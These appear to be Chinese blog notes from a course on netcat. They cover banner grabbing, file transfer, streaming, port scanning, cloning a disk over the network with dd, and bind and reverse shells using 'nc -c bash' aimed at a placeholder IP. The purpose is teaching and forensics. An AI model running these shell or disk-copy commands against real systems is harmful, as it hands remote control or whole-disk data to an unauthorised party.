文章目录
NETCAT----NC作为客户端使用的方法,任务10内容
指令用法:nc -vn ip port
n是指ip v是指展示详细内容
作为客户端连接服务器端最基本的命令。
1.查看服务器相关的banner信息。
先ping一下获取pop3端口的ip—123…79
提示信息:端口是Open状态,163服务器是用的是Coremail。
2.文本信息的传递。
A:nc -l -p port,-l即listen监听port,-p指定port,A端作用为服务器端,监听这个端口是看有谁连,之后就把文件传给连接这个端口的电脑。
B:nc -nv ipA portA,对应A开放信息进行连接。
#查看指定端口是否开放指令
#netstat -pantu | grep port
作用:远程电子取证,原则是尽量对需要审计的对象不做修改,避免破坏证据。例如需要将审查对象上的内容传到自己电脑上而不做保留就可以使用nc
利用管道:指令A | 指令B,即可将指令A所得的结果作为指令B的输入来使用。审计过程中远程进行审计时标准的使用nc传输的方法。
远程接收重定向:nc -l -p port > xx.txt,本地监听指定port,如有传进来的信息则存储到xx.txt文件中。
B方指令 -q 1,文件传输结束后等待一秒钟,就自动断开连接。用于文件较大或传输时间较长时。
#查看文件
#cat xx.txt
任务11内容
3.可作为文件传输服务器,如FTP共享文件
A作为接收端:nc -lp port >x1.txt
B作为发送端:nc -nv ipA portA < x2.txt -q 1
也可以将A作为发送端,B作为接收端。只需要调整<>方向。
A:tar -cvf -music/ | nc -lp port -q 1#将流媒体文件打包好等待端口传输
B:nc -nv ip port | tar -xvf-
A向B发送,接收到一点播放一点。
加密传输文件:
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 #mcrypt需要自己下载
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
4.流媒体服务器
• A: cat xx.mp4 | nc -lp port
• B: ip port | mplayer -vo x11 -cache 3000 -
5.端口扫描,作为辅助参考。
nc -nvz ip 1-port
• nc -nvz 1.1.1.1 1-65535
• nc –vnzu 1.1.1.1 1-1024
-z探测到开放则继续探测。
默认情况下探测到的是TCP端口
要探测UDP端口 加一个u
6.远程克隆硬盘
• A: nc -lp 333 | dd of=/dev/sda
• B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程电子取证,当怀疑目标服务器被入侵时可以将目标服务器进行硬盘备份,会将磁盘上每一位完全镜像过去,
原原本本的复制过去一模一样,所以可以对拷贝过来的信息进行分析,用dd命令进行硬盘复制。
7.远程控制(双向控制)
• 正向:A作为服务器端侦听一个端口,通过客户端连接这个端口时,服务器将自己的bash shell传给客户端,符合正常的连接过程,客户端连接服务器获得远程控制权。
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
• 反向:实现服务器端等着客户端将控制送去
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash
• 注:Windows⽤户把bash改成cmd;
• Nc缺乏加密和⾝份验证的能⼒,传输管道透明,文件传输过程是明文,容易被中间人劫持,嗅探再还原。
• Ncat可以弥补NC的不足,包含于nmap⼯具包中。
管道式传输,管道本身是加密的。
• A:ncat ncat -c bash --allow ip -vnl port --ssl
• B:ncat -nv ip port --ssl
nc版本差别较大,参数命令兼容性需要查看手册,尽量统一版本。
7226
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
